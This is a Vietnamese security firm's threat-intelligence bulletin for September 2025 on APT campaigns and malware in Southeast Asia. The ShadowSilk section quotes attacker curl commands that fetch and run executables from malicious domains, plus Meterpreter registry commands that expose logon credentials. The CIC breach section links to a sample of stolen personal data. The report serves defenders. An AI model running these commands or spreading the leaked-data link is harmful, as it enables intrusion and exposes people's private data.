THÔNG TIN CÁC MỐI ĐE DỌA BẢO MẬT THÁNG 09 – 2025


Hàng tháng, NCS sẽ t
ổng hợp các thông tin bảo mật về APT, Malware, CVEs

1         CÁC MỐI ĐE DỌA NÂNG CAO – ADVANCED THREATS

Trong tháng 09/2025, đội ngũ NCS ghi nhận các chiến dịch tấn công APT đáng chú ý sau:

STT Tên chiến dịch Mô tả
        1              ShinyHunters tấn công Trung tâm Thông tin Tín dụng Quốc gia (CIC) Gần đây, nhóm ShinyHunters rao bán dữ liệu được cho đánh cắp từ Trung tâm Thông tin Tín dụng Quốc gia (CIC) – cơ quan trực thuộc Ngân hàng Nhà nước Việt Nam. Dữ liệu khoảng 160 triệu bản ghi được rao bán với mức giá 175.000 USD, bao gồm các thông tin như thông tin nhận dạng cá nhân (PII), thông tin thanh toán tín dụng, phân tích rủi ro, chi tiết thẻ tín dụng, mã số thuế, báo cáo thu nhập và hồ sơ công nợ …
        2              Threat Actor Trung Quốc triển khai BadIIS trong chiến dịch SEO Poisoning nhắm mục tiêu khu vực Đông Nam Á – Phạm vi: tập trung vào Đông Á và Đông Nam Á

– Mục đích: phát tán nội dung cờ bạc, khiêu dâm nhằm trục lợi tài chính

– Công cụ: Nhóm tấn công sử dụng BadIIS, triển khai nhiều biến thể khác như lightweight ASP.NET page handlers, IIS module .NET và script PHP để duy trì hoạt động

        3              Android Banking Trojan giả mạo các ứng dụng hợp pháp – Mục tiêu: người dùng Android tại Indonesia và Việt Nam

– Công cụ: sử dụng banking trojan được ngụy trang thành các ứng dụng thanh toán hợp pháp sử dụng banking trojan được ngụy trang thành các ứng dụng thanh toán hợp pháp

 

        4              GhostRedirector tấn công máy chủ Windows sử dụng Rungan backdoor và Gamshen IIS module – Mục tiêu: lĩnh vực bảo hiểm, y tế, bán lẻ, vận tải, công nghệ và giáo dục

– Phạm vi: theo thống kê có ít nhất 65 máy chủ Windows đã bị xâm nhập, chủ yếu khu vực Brazil, Thái Lan, Việt Nam

– Công cụ/cách thức tấn công: sử dụng các công cụ chính: Rungan – backdoor viết bằng C++ có khả năng thực thi lệnh trên máy chủ bị xâm nhập, và Gamshen – module Internet Information Services (IIS) nhằm thao túng kết quả tìm kiếm trên Google thông qua kỹ thuật SEO. Ngoài ra, GhostRedirector còn sử dụng một số công cụ khác và khai thác EfsPotato/ BadPotato để leo thang đặc quyền trên máy chủ bị xâm nhập.

        5              Nhóm tấn công ShadowSilk nhắm vào tổ chức chính phủ khu vực Trung Á và Châu Á – Thái Bình Dương – Phạm vi: khu vực Trung Á và Châu Á – Thái Bình Dương

– Mục tiêu chính: đánh cắp dữ liệu.

– Công cụ: Nhóm tấn công sử dụng cơ sở hạ tầng và các công cụ liên quan đến YoroTrooper, ngoài ra sử dụng bộ công cụ đa dạng bao gồm các công cụ khai thác, công cụ kiểm thử xâm nhập và web panel để quản lý các thiết bị bị ảnh hưởng

        6              UNC6384 nhắm mục tiêu vào khu vực Đông Nam Á – Phạm vi: khu vực Đông Nam Á

– Mục đích: được cho là hỗ trợ hoạt động gián điệp mạng

– Công cụ/cách thức tấn công: chiếm đoạt lưu lượng truy cập web, sử dụng captive-portal để chuyển hướng, phân phối một chương trình tải xuống được ký số có tên STATICPLUGIN, dẫn tới triển khai backdoor SOGU.SEC (còn gọi là PlugX) trong bộ nhớ. Ngoài ra, chuỗi tấn công lợi dụng kỹ thuật xã hội tinh vi, bao gồm chứng chỉ ký mã hợp lệ, tấn công adversary-in-the-middle (AitM), và các phương pháp thực thi gián tiếp để tránh phát hiện

        7              Hive0154 nhắm mục tiêu vào khu vực Đông Nam Á – Phạm vi: khu vực Đông Nam Á, đặc biệt nhắm mục tiêu vào Thái Lan

– Công cụ: sử dụng biến thể backdoor Toneshell, một loại worm USB mới có tên SnakeDisk

        8              Nhóm APT Trung Quốc tấn công vào khu vực Philippine – Mục tiêu: công ty quân sự khu vực Philippines

– Mục đích chính: giành được quyền truy cập liên tục cho hoạt động gián điệp, phù hợp với các lợi ích quốc gia

Thông tin chi tiết các chiến dịch:

1.1      ShinyHunters tấn công Trung tâm Thông tin Tín dụng Quốc gia (CIC)

Tổng quan sự cố:

  • Đơn vị bị tấn công: Trung tâm Thông tin Tín dụng Quốc gia (CIC), trực thuộc Ngân hàng Nhà nước Việt Nam.
  • Quy mô: Hacker nhóm ShinyHunters tuyên bố đã lấy được hơn 160 triệu hồ sơ, bao gồm cả dữ liệu lịch sử, ước tính ảnh hưởng tới hầu hết dân số Việt Nam (~100 triệu người).
  • Dữ liệu lộ lọt: Thông tin cá nhân (PII), dữ liệu tín dụng, số thẻ tín dụng (mã hóa), số quân nhân, giấy tờ chính phủ, mã số thuế, kê khai thu nhập, nợ vay…
  • Nguyên nhân: Hacker khai thác lỗ hổng “n-day” trong ứng dụng không còn được hỗ trợ (end-of-life), không có các bản vá bảo mật.

Đặc điểm vụ việc:

  • Nhóm hacker tuyên bố xâm nhập toàn bộ hệ thống trong 24 giờ.
  • Không gửi yêu cầu tống tiền, chỉ công bố và rao bán dữ liệu trên diễn đàn ngầm.

Mức độ nghiêm trọng

  • Đây có thể coi là vụ rò rỉ dữ liệu lớn nhất lịch sử Việt Nam, tương đương các vụ toàn cầu.
  • Nguy cơ: lộ lọt thông tin nhạy cảm của cá nhân và tổ chức gây đe dọa an ninh tài chính và tín dụng quốc gia.

Thông tin nhóm tấn công

ShinyHunters là nhóm tội phạm mạng không rõ nguồn gốc, hoạt động vì lợi ích tài chính. Nhóm nổi tiếng với các cuộc tấn công tinh vi nhắm vào nhiều mục tiêu khác nhau, bao gồm doanh nghiệp, tổ chức và cơ quan chính phủ. ShinyHunters thường sử dụng các kỹ thuật tấn công lừa đảo (phishing) hoặc sử dụng các bộ công cụ khai thác các lỗ hổng bảo mật nhằm truy cập vào hệ thống của nạn nhân, từ đó triển khai phần mềm độc hại nhằm đánh cắp dữ liệu nhạy cảm như tên, địa chỉ, số điện thoại, số An sinh Xã hội và thông tin thẻ tín dụng.

Chi tiết sự vụ

Gần đây, nhóm ShinyHunters rao bán dữ liệu được cho đánh cắp từ Trung tâm Thông tin Tín dụng Quốc gia (CIC) – cơ quan trực thuộc Ngân hàng Nhà nước Việt Nam. Dữ liệu khoảng 160 triệu bản ghi được rao bán với mức giá 175.000 USD, bao gồm các thông tin như thông tin nhận dạng cá nhân (PII), thông tin thanh toán tín dụng, phân tích rủi ro, chi tiết thẻ tín dụng, mã số thuế, báo cáo thu nhập và hồ sơ công nợ …

Theo DataBreach, nhóm ShinyHunters đã lợi dụng một lỗ hổng cũ (N-day vulnerability) trong một phần mềm đã hết vòng đời (end-of-life), xâm nhập vào CIC và đánh cắp khoảng 3 tỷ bản ghi, trong đó có 160 triệu bản ghi chứa thông tin cá nhân người Việt Nam.

Trên bài đăng rao bán, ShinyHunters công bố data sample “CICVN_SHINYHUNTERS_2025” chứa các thông tin cá nhân như họ tên, địa chỉ, số điện thoại, ngày sinh, số căn cước, mã số thuế, cùng thông tin doanh nghiệp, bao gồm 136 tệp với tổng dung lượng 342 MB.

Thông tin data sample xem tại: https://limewire.com/d/rB2fO#p8TslmujV2

1.2      Threat Actor Trung Quốc triển khai BadIIS trong chiến dịch SEO Poisoning nhắm mục tiêu khu vực Đông Nam Á

NCS Threat Intelligence theo dõi và ghi nhận bài đăng mô tả chiến dịch SEO poisoning do Threat Actor Trung Quốc thực hiện, được theo dõi với mã CL-UNK-1037, có nhiều điểm trùng lặp với Group 9 và chiến dịch DragonRank. Nhóm tấn công này lợi dụng module BadIIS để chặn, chỉnh sửa lưu lượng và sử dụng các máy chủ bị xâm nhập thành reverse proxy, từ đó phát tán nội dung cờ bạc, khiêu dâm nhằm trục lợi tài chính. Cấu hình mã độc cho thấy mục tiêu chính là Đông Á và Đông Nam Á. Ngoài BadIIS, nhóm còn triển khai nhiều biến thể khác như lightweight ASP.NET page handlers, IIS module .NET và script PHP để duy trì hoạt động.

Chiến dịch này có hai giai đoạn chính. Đầu tiên, kẻ tấn công dùng BadIIS để phát hiện crawler thông qua header User-Agent, liên lạc với máy chủ C2 để nhận nội dung HTML chứa từ khóa SEO và trả nội dung đó cho crawler khiến trang bị xâm nhập được công cụ tìm kiếm ghi nhận và xếp hạng cho các từ khóa do kẻ tấn công chọn, từ đó thao túng kết quả tìm kiếm. Sau đó, khi người dùng click, BadIIS kiểm tra header Referer, liên lạc với C2 để truy xuất nội dung độc hại chuyển hướng người dùng đến trang web lừa đảo.

Phân tích cấu hình của BadIIS cho thấy chiến dịch này nhắm đến các công cụ tìm kiếm phổ biến ở Đông Nam Á, trong đó có Việt Nam dựa trên từ khóa tìm kiếm của kẻ tấn công như “Cốc Cốc”, “Timkhap”, “viet”. Hai từ khóa “Cốc Cốc”, “Timkhap” là các công cụ tìm kiếm phổ biến tại Việt Nam, trong khi từ “viet” liên quan đến các tìm kiếm chung về Việt Nam. Việc tập trung này cho thấy chiến dịch nhắm mục tiêu vào hệ sinh thái kỹ thuật số Việt Nam.

Module sử dụng cấu hình này để thực thi core logic khi chạy. Nếu tiêu đề User-Agent của HTTP request khớp với một từ khóa trong danh sách, module sẽ nhận diện visitor là crawler của công cụ tìm kiếm và thực hiện SEO poisoning. Module sẽ liên lạc với máy chủ C2 để truy xuất trang web HTML độc hại và trả lại nội dung này làm response.

Cơ chế này tạo mồi nhử bằng cách gửi nội dung thao túng cho crawler, giúp trang web bị xâm nhập xếp hạng cho các từ khóa phổ biến mà không liên quan. Ví dụ dưới đây cho thấy từ khóa “xôi lạc tv trực tiếp bóng đá hôm nay” được sử dụng để tận dụng uy tín trang web và phục vụ nội dung lừa đảo. Kết quả tìm kiếm Google cho từ khóa này cho thấy một cơ quan chính phủ tại Đông Nam Á đã bị xâm nhập để phát tán nội dung lừa đảo.

Ngược lại, khi header Referer của một HTTP request chứa bất kỳ từ khóa nào trong cấu hình của module, module sẽ xác định đây là genuine user. Trong trường hợp này, module liên lạc với máy chủ C2 và proxy nội dung độc hại trực tiếp đến trình duyệt của nạn nhân. Ví dụ dưới đây cho thấy máy chủ web bị xâm nhập chuyển hướng người dùng đến một trang cá cược mà không nghi ngờ.

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

1.3      Android Banking Trojan giả mạo các ứng dụng hợp pháp

NCS Threat Intelligence theo dõi và ghi nhận bài đăng trên không gian mạng mô tả nhóm tấn công nhắm mục tiêu vào nhóm tấn công nhắm mục tiêu vào người dùng Android tại Indonesia và Việt Nam sử dụng banking trojan được ngụy trang thành các ứng dụng thanh toán hợp pháp sử dụng banking trojan được ngụy trang thành các ứng dụng thanh toán hợp pháp.

Các nhà nghiên cứu phát hiện ứng dụng giả mạo trên Google Play Store và các website phishing. Trang icrossingappxyz[.]com chứa các button giả mạo nhằm lừa người dùng tải xuống ứng dụng trên Google Play Store/App Store. Khi click vào nút Google Play, trang web sẽ hiển thị thanh tiến trình tải xuống và yêu cầu người dùng chọn vị trí lưu tệp trên thiết bị. Liên kết Apple App Store không hoạt động.

Thay vì dẫn trực tiếp đến file APK, trang web sử dụng obfuscation wrapper cùng Socket.IO để thiết lập kết nối WebSocket: socket.emit(‘startDownload’, …). Máy chủ sau đó chia nhỏ file APK thành nhiều chunk gửi về trình duyệt, kèm thông báo tiến trình (downloadProgress). Script sử dụng các thông báo này để cập nhật thanh tiến trình, khiến người dùng tin rằng quá trình tải xuống diễn ra bình thường. Khi máy chủ gửi thông báo “downloadComplete”, script sẽ ghép các chunk trong bộ nhớ, đặt kiểu (type) thành ‘application/vnd.android.package-archive’. Sau đó, tạo URL tạm thời và một thẻ <a> ẩn trỏ tới URL này rồi tự động click, khởi tạo hộp thoại tải xuống cho người dùng. Nhóm tấn công sử dụng kỹ thuật này nhằm vượt qua cơ chế chặn tải trực tiếp file APK của firewall và hệ thống bảo mật, đồng thời làm cho các công cụ scan tự động khó phát hiện vì không có URL tĩnh trỏ tới file độc hại. Ngoài ra, nhóm tấn công còn triển khai các trang phishing khác như trang webmạo ứng dụng nộpthuế M-Pajak, hiển thị giao diện giống Google App Store nhưng dẫn trực tiếp đến URL chứa file độc hại.

Trong 12 tháng qua, nhóm tấn công sử dụng mẫu đăng ký tên miền đặc trưng, gồm tái sử dụng chứng chỉ TLS cho hai tên miền, nhiều tên miền cùng trỏ về một địa chỉ IP

  • ISP: Alibaba, Scloud, CloudFlare
  • Quốc gia IP: Singapore (SG), Indonesia (ID)
  • Tiêu đề trang web và nội dung phổ biến: Identitas Kependudukan Digital – Apps on Google Play
  • Loại máy chủ: nginx
  • Nameserver: share-dns[.]net, cloudflare[.]com
  • Nhà phát hành SSL: R10, R11, WE1
  • Registrar: Gname.com Pte. Ltd.

Mẫu đăng ký tên miền phổ biến nhất nhất là sử dụng ISP Alibaba, registrar Gname, và nameserver share-dns[.]net.

Các tên miền thường được kích hoạt nhanh chóng, trung bình chỉ sau 10,5 giờ, và phần lớn hoạt động vào thời điểm ban ngày khu vực Đông Á, phù hợp với việc nhắm tới người dùng di động tại Indonesia và Việt Nam.

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

1.4      GhostRedirector tấn công máy chủ Windows sử dụng Rungan backdoor và Gamshen IIS module

NCS Threat Intel theo dõi và ghi nhận bài đăng trên không gian mạng mô tả nhóm tấn công GhostRedirector nhắm vào lĩnh vực bảo hiểm, y tế, bán lẻ, vận tải, công nghệ và giáo dục. Theo thống kê có ít nhất 65 máy chủ Windows đã bị xâm nhập, chủ yếu khu vực Brazil, Thái Lan, Việt Nam, sử dụng các công cụ chính: Rungan – backdoor viết bằng C++ có khả năng thực thi lệnh trên máy chủ bị xâm nhập, và Gamshen – module Internet Information Services (IIS) nhằm thao túng kết quả tìm kiếm trên Google thông qua kỹ thuật SEO. Ngoài ra, GhostRedirector còn sử dụng một số công cụ khác và khai thác EfsPotato/ BadPotato để leo thang đặc quyền trên máy chủ bị xâm nhập.

Truy cập ban đầu, kẻ tấn công khai thác lỗ hổng (nhiều khả năng khai thác qua lỗ hổng SQL injection), sau đó sử dụng Powershell để tải xuống các công cụ độc hại từ server trung gian 868id[.]com. Hầu hết các lệnh PowerShell được khởi chạy từ sqlserver.exe với xp_cmdshell, cho phép thực thi câu lệnh trên máy. GhostRedirector cũng cài đặt GoToHTTP để kết nối từ xa và cài đặt phần mềm độc hại, bao gồm backdoor C++ và trojan IIS trong thư mục C:\ProgramData\Microsoft\DRM\log.

Kẻ tấn công xâm nhập vào Windows server, tải xuống và thực thi các công cụ độc hại bao gồm công cụ leo thang đặc quyền, drop webshell, backdoor C++ Rungan, IIS trojan Gamshen. Mục đích của công cụ leo thang đặc quyền là để tạo tài khoản trong nhóm Administrators nhằm thực hiện các hoạt động với đặc quyền cao hoặc được sử dụng trong trường hợp mất quyền truy cập vào máy chủ. Nhóm tấn công sử dụng hai công cụ chính là Rungan và Gamshen.

Rungan

Rungan (SHA‑1: 28140A5A29EBA098BC6215DDAC8E56EACBB29B69) là một backdoor C/C++ được cài đặt tại C:\ProgramData\Microsoft\DRM\log\miniscreen.dll. Backdoor này sử dụng AES-CBC để giải mã chuỗi, với IV và key là 030201090405060708090A0B0C0D0E0F, và dựa trên PDB path F:\x5\AvoidRandomKill-main\x64\Release\IISAgentDLL.pdb

Chức năng chính là đăng ký một URL được mã hóa cứng (http://+:80/v1.0/8888/sys.html) trên máy chủ, bỏ qua IIS bằng cách lạm dụng HTTP Server API. Sau đó backdoor chờ các yêu cầu HTTP khớp với URL này, và thực thi lệnh trên máy chủ bị xâm nhập.

Gamshen

Gamshen là một IIS native module được viết bằng C/C++. Chức năng chính là chặn các yêu cầu từ Googlebot (trình thu thập dữ liệu của Google) gửi đến máy chủ bị xâm nhập, sau đó sửa đổi phản hồi hợp pháp của máy chủ. GhostRedirector lợi dụng các kỹ thuật SEO như tạo backlink giả từ website hợp pháp đã bị xâm phạm sang website mục tiêu, nhằm thao túng thứ hạng tìm kiếm trên Google của bên thứ ba. Lưu ý: người dùng thông thường truy cập website sẽ không bị ảnh hưởng, vì Gamshen chỉ kích hoạt khi nhận thấy truy vấn từ Googlebot.

Ngoài ra, kẻ tấn công cũng triển khai một số công cụ khác như BadPotato/EfsPotato nhằm leo thang đặc quyền, Zunput nhằm thu thập thông tin như đường dẫn vật lý trên máy chủ, tên website, với mỗi site thu thập giao thức, địa chỉ IP, hostname…

MITRE ATT&CK

Tactic ID Name Description
Resource Development T1588.002 Obtain Capabilities: Tool GhostRedirector uses .NET Reactor to obfuscate its tools, and used EfsPotato and BadPotato to develop custom privilege escalation tools.
T1587.001 Develop Capabilities: Malware GhostRedirector develops its own malware
T1608.006 Stage Capabilities: SEO Poisoning GhostRedirector uses SEO poisoning to manipulate search results and drive traffic to a third-party website.
T1583.001 Acquire Infrastructure: Domains GhostRedirector uses malicious domains for hosting payloads and for its C&C servers.
T1583.004 Acquire Infrastructure: Server GhostRedirector leverages Cloudflare on its infrastructure.
T1608.001 Stage Capabilities: Upload Malware GhostRedirector has staged Rungan and Gamshen on attacker-controlled servers.
T1608.002 Stage Capabilities: Upload Tool GhostRedirector has staged various malicious and legitimate tools on attacker-controlled servers.
T1588.003 Obtain Capabilities: Code Signing Certificates GhostRedirector obtained a certificate for signing its tools, like those for privilege escalation.
Initial Access T1190 Exploit Public-Facing Application GhostRedirector exploits an unknown SQL injection vulnerability on the victim’s server.
Execution T1106 Native API GhostRedirector may use APIs such as HttpInitialize and HttpAddUrl for registering a URL.
T1059.001 Command and Scripting Interpreter: PowerShell GhostRedirector uses PowerShell interpreter to download malware.
T1059.003 Command and Scripting Interpreter: Windows Command Shell GhostRedirector can execute cmd.exe commands to download malware.
T1559 Inter-Process Communication Comdai can create a pipe to communicate and receive information from another process.
Persistence T1546 Event Triggered Execution Gamshen is loaded by the IIS Worker Process (w3wp.exe) when the IIS server receives an inbound HTTP request.
Privilege Escalation T1134 Access Token Manipulation GhostRedirector can manipulate tokens to perform a local privilege escalation.
T1112 Modify Registry GhostRedirector can modify a Windows registry key to perform RID hijacking.
Defense Evasion T1027 Obfuscated Files or Information GhostRedirector obfuscates its local privilege escalation tools using .NET Reactor.
T1027.009 Obfuscated Files or Information: Embedded Payloads GhostRedirector embedded webshells into its payloads like Zunput to be dropped on compromised server.
T1140 Deobfuscate/Decode Files or Information GhostRedirector uses AES in CBC mode to decrypt strings in the backdoor Rungan.
Discovery T1083 File and Directory Discovery GhostRedirector can use Zunput to list directory content on a victim’s server.
Command and Control T1105 Ingress Tool Transfer GhostRedirector can abuse the tool certutil.exe to download malware.
T1219 Remote Access Software GhostRedirector may use the GoToHTTP tool for connecting remotely to victims.
T1071.001 Application Layer Protocol: Web Protocols GhostRedirector relies on HTTP to communicate with the backdoor Rungan.
T1008 Fallback Channels GhostRedirector can deploy the tool GoToHTTP or create malicious users on the compromised server to maintain access.
Impact T1565 Data Manipulation GhostRedirector can modify the response of a compromised server intended for the Google crawler, in attempts to influence search results order.

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

1.5      Nhóm tấn công ShadowSilk nhắm vào tổ chức chính phủ khu vực Trung Á và Châu Á – Thái Bình Dương

NCS Threat Intelligence theo dõi và ghi nhận bài đăng trên không gian mạng mô tả nhóm tấn công ShadowSilk nhắm vào tổ chức chính phủ khu vực Trung Á và Châu Á – Thái Bình Dương, hoạt động ít nhất từ 2023 đến tháng 7/2025. Mục tiêu chính của nhóm là nhắm vào tổ chức chính phủ nhằm đánh cắp dữ liệu.

Nhóm tấn công sử dụng cơ sở hạ tầng và các công cụ liên quan đến YoroTrooper, ngoài ra sử dụng bộ công cụ đa dạng bao gồm các công cụ khai thác, công cụ kiểm thử xâm nhập và web panel để quản lý các thiết bị bị ảnh hưởng. ShadowSilk sử dụng nhiều công cụ khai thác khác nhau như:

  • Khai thác lỗ hổng: CVE-2018-7600, CVE-2018-7602, CVE-2024-27956
  • Công cụ tấn công ứng dụng web: sqlmap, wpscan
  • Công cụ trinh sát: FOFA, Shodan, fscan, gobuster, dirsearch
  • Công cụ xâm nhập và điều khiển: Metasploit, Cobalt Strike, các ứng dụng và tập lệnh tùy chỉnh để truy cập trên bot Telegram, proxy utility như resocks, proxifier, chisel, rsocx. Chinese utilities: Antsword, Godzilla webshell, WeblogicTool, FinalShell và HTTP-Reverse-Shell, Drupalgeddon2.
  • Control panels JRAT và MORF Project

Trong quá trình reconnaissance hệ thống, kẻ tấn công sử dụng công cụ public như Shodan và FOFA để thu thập dữ liệu. Truy cập ban đầu, kẻ tấn công sử dụng email phishing nhằm dụ dỗ nạn nhân mở một kho lưu trữ được bảo vệ bằng mật khẩu và chạy tệp thực thi bên trong.

Sau khi nạn nhân thực thi, thiết bị sẽ bị nhiễm mã độc, sử dụng Telegram làm kênh C2 cho phép kẻ tấn công thực thi lệnh từ xa và nhận kết quả thực thi theo thời gian thực.

Sau khi giành được quyền truy cập vào máy chủ thông qua mã độc, kẻ tấn công tải xuống và thực thi các chương trình bổ sung

/73640 cmd /c curl -o c:\users\public\music\147.exe hxxps://document[.]hometowncity[.]cloud/svcnost.exe

/73640 start c:\users\public\music\147.exe

/73640 cmd /c c:\users\public\music\147.exe

/26450 cmd /c curl -o c:\users\public\gservice.exe hxxps://document[.]webmailsession[.]com/prog/147.exe

/26450 cmd /c start c:\users\public\gservice.exe

Để thiết lập persistence, kẻ tấn công triển khai các công cụ độc hại và sửa đổi Windows registry nhằm đảm bảo tệp nhị phân sẽ tự động thực thi khi hệ thống khởi động. Sử dụng tiện ích có sẵn tại hxxps://github[.]com/peass-ng/PEASS-ng để xác định cơ chế duy trì (persistence), tìm mật khẩu đã lưu trong tệp cấu hình và tìm cách nâng cao đặc quyền.

Kẻ tấn công sử dụng công cụ tùy chỉnh – được cho là mua trên diễn đàn dark web, nhằm đánh cắp file lưu trữ mật khẩu Chrome, cùng với decryption key tại AppData\Local\Google\Chrome\User Data\Local State để giải mã các tệp lưu trữ này.

Với mục đích reconnaissance nội bộ, kẻ tấn công sử dụng fscan utility. Ngoài ra, sau khi truy cập được vào thiết bị nạn nhân, kẻ tấn công thực thi các lệnh như Dir, ipconfig, whoami, systeminfo, sử dụng Meterpreter và thực thi các lệnh dưới đây. Các lệnh này sửa đổi hoặc truy vấn giá trị UseLogonCredential trong cài đặt WDigest authentication.

execute -H -f reg -a “add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1”

execute -H -f reg -a “add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1” -i

execute -H -f reg -a “query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential” -i

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

1.6     UNC6384 nhắm mục tiêu vào khu vực Đông Nam Á

NCS Threat Intel theo dõi và ghi nhận bài đăng trên không gian mạng mô tả UNC6384 nhắm mục tiêu vào khu vực Đông Nam Á. Mục đích của chiến dịch này được cho là hỗ trợ hoạt động gián điệp mạng, phù hợp với lợi ích chiến lược của Cộng hòa Nhân dân Trung Hoa. Chiến dịch này chiếm đoạt lưu lượng truy cập web, sử dụng captive-portal để chuyển hướng, phân phối một chương trình tải xuống được ký số có tên STATICPLUGIN, dẫn tới triển khai backdoor SOGU.SEC (còn gọi là PlugX) trong bộ nhớ. Chuỗi tấn công lợi dụng kỹ thuật xã hội tinh vi, bao gồm chứng chỉ ký mã hợp lệ, tấn công adversary-in-the-middle (AitM), và các phương pháp thực thi gián tiếp để tránh phát hiện.

Các nhà nghiên cứu phát hiện kẻ tấn công chiếm dụng captive portal, giả mạo cập nhật Adobe Plugin để phát tán mã độc. Chuỗi chuyển hướng từ miền hợp lệ gstatic.com dẫn đến trang của đối tượng tấn công. Sau khi bị chuyển hướng, kẻ tấn công cố gắng lừa nạn nhân cài đặt phần mềm và tải xuống phần mềm độc hại. Trang web đích giả mạo một trang cập nhật phần mềm hợp pháp, sử dung kết nối https và được ký số.

Trang đích ban đầu hoàn toàn trống, với thanh màu vàng trên cùng và một nút với nội dung “Install Missing Plugins…” Nếu thành công, người dùng sẽ bỏ qua các biện pháp bảo mật trên máy chủ để thực thi mã độc.

Ở chế độ nền, mã Javascript được tải từ tệp script có tên “ style3.js” được lưu trữ trên cùng domain với trang HTML. Khi mục tiêu clickvào nút cài đặt, hàm “myFunction” (nằm trong script đã tải) sẽ được thực thi.

Bên trong myFunction một ảnh khác được tải để hiển thị làm ảnh nền trên trang web. Vị trí của cửa sổ trình duyệt cũng được đặt thành URL của tệp thực thi, tệp này cũng được lưu trữ trên cùng một tên miền. Sau đó, tải xuống AdobePlugins.exe và hình nền mới sẽ được hiển thị trên trang web, hướng dẫn cách thực thi tệp đã tải xuống và vượt qua các biện pháp bảo vệ của Windows. Khi chạy tệp thực thi, lời nhắc cài đặt giả mạo sẽ hiển thị với các tùy chọn “Install” và “Cancel”. Tuy nhiên, payload SOGU.SEC đã chạy trên thiết bị mục tiêu

Sau khi xâm nhập thành công vào hệ thống mục tiêu, mã độc sẽ khởi tạo một chuỗi triển khai nhiều giai đoạn. Cuối cùng một DLL mới có tên CANONSTAGER thực hiện triển khai SOGU.SEC trực tiếp trong bộ nhớ, sau đó thiết lập liên lạc với máy chủ C2.

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

1.7     Hive0154 nhắm mục tiêu vào khu vực Đông Nam Á

NCS Threat Intel theo dõi và ghi nhận bài đăng trên không gian mạng mô tả nhóm tấn công Hive0154 (hay còn gọi là Mustang Panda) – nhóm tấn công có liên kết với Trung Quốc hoạt động ít nhất từ năm 2012, nhắm mục tiêu vào Đông Nam Á. Chiến dịch sử dụng biến thể backdoor Toneshell, một loại worm USB mới có tên SnakeDisk, đặc biệt nhắm mục tiêu vào Thái Lan.

Chuỗi tấn công điển hình bao gồm sử dụng email phishing để phát tán mã độc như Pubload hoặc Toneshell. Trong đó Pubload cũng hoạt động tương tự nhue Toneshell, có khả  năng tải xuống các shellcode payload thông qua HTTP POST request từ máy chủ C2. Các biến thể được nhóm tấn công sử dụng được đặt tên là Toneshell8 và Toneshell9, cả hai biến thể này cho phép duy trì hai phiên reverse shell hoạt động song song.

Toneshell8 (tháng 3/2025)

Biến thể này được phát hiện vào tháng 3/2025, được cập nhật bằng cách đưa junk code vào các hàm của mã độc. Các đoạn junk code này thực hiện hành vi sau:

  • Sử dụng lệnh gọi API để ghi các tệp tạm thời ngẫu nhiên rồi xóa
  • Sao chép và lặp qua một string, các string được sao chép từ trang web ChatGPT của OpenAI.
  • Tạm dừng (sleep) trong các khoảng thời gian ngẫu nhiên

Toneshell9 (tháng 7/2025)

Đây là biến thể mới nhất của Toneshell, được đặt lên là Toneshell9 với một số chức năng chính như sau:

  • Khả năng duy trì quyền truy cập: Toneshell9 thiết lập persistence thông qua các kỹ thuật DLL sideloading. Kỹ thuật này lợi dụng cách các ứng dụng hợp pháp tải các DLL, buộc tải một DLL độc hại cùng tên trước khi tải DLL hơp pháp, giúp mã độc thi dưới tiến trình hợp lên, làm giảm khả năng phát hiện
  • Giao tiếp C2 được che giấu bằng cách ngụy trang lưu lượng truy cập thành các gói TLS 1.2 Application Data
  • Khả năng quản lý đồng thời nhiều máy chủ C2, cấu hình proxy và khóa mã hóa. Điều này cho phép mã độc duy trì kết nối ngay cả khi một số máy chủ C2 bị vô hiệu hóa
  • Liệt kê các hive Registry Windows để tìm cài đặt proxy.

Ngoài ra, một loại worm USB mới có tên SnakeDisk chủ yếu nhắm mục tiêu vào thiết vị tại Thái Lan, được sử dụng để phát hiện các thiết bị USB mới, có được kết nối với máy chủ, sử dụng làm phương tiện lây lan. Cụ thể, di chuyển các tập tin hiện có trên USB vào thư mục con mới, lừa nạn nhân nhấp vào phần mềm độc hại trên máy tính bằng cách đặt tên cho phần mềm đó theo tên ổ đĩa của thiết bị USB hoặc USB.exe. Sau khi mã độc khởi chạy, các tập tin sẽ được sao chép trở lại vị trí ban đầu.

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

1.8     Nhóm APT Trung Quốc tấn công vào khu vực Philippine

NCS Threat Intel theo dõi và ghi nhận bài đăng trên không gian mạng mô tả nhóm APT Trung Quốc tấn công vào công ty quân sự khu vực Philippines, triển khai framework mã độc mới gọi là EggStreme. Mục đích chính của nhóm tấn công là giành được quyền truy cập liên tục cho hoạt động gián điệp, phù hợp với các lợi ích quốc gia.

Kẻ tấn công thực thi một batch script đăng nhập hàng loạt từ một SMB share, nằm tại \\<remote samba share>\netlogon\logon.bat. Chức năng chính của tập lệnh là triển khai hai tệp vào thư mục %APPDATA%\Microsoft\Windows\Windows Mail\ trong đó một tệp nhị phân hợp lệ của Windows có tên WinMail.exe và một DLL độc hại có tên mscorsvc.dll. Khi tệp WinMail.exe được thực thi, sẽ load tệp mscorsvc.dll độc hại, cho phép kẻ tấn công thực thi mã độc ngụy trang dưới dạng chương trình hợp pháp và vượt qua cơ chế bảo mật.

Tệp mscorsvc.dll là giai đoạn đầu của chuỗi tấn công, gọi là EggStremeFuel, có vai trò là loader và chịu trách nhiệm thiết lập môi trường cho payload cuối cùng. Thực hiện fingerprint hệ thống để thu thập thông tin. Khởi tạo reverse-shell bằng cách gọi cmd.exe và tạo kênh liên lạc với máy chủ C2 qua read-write pipe.

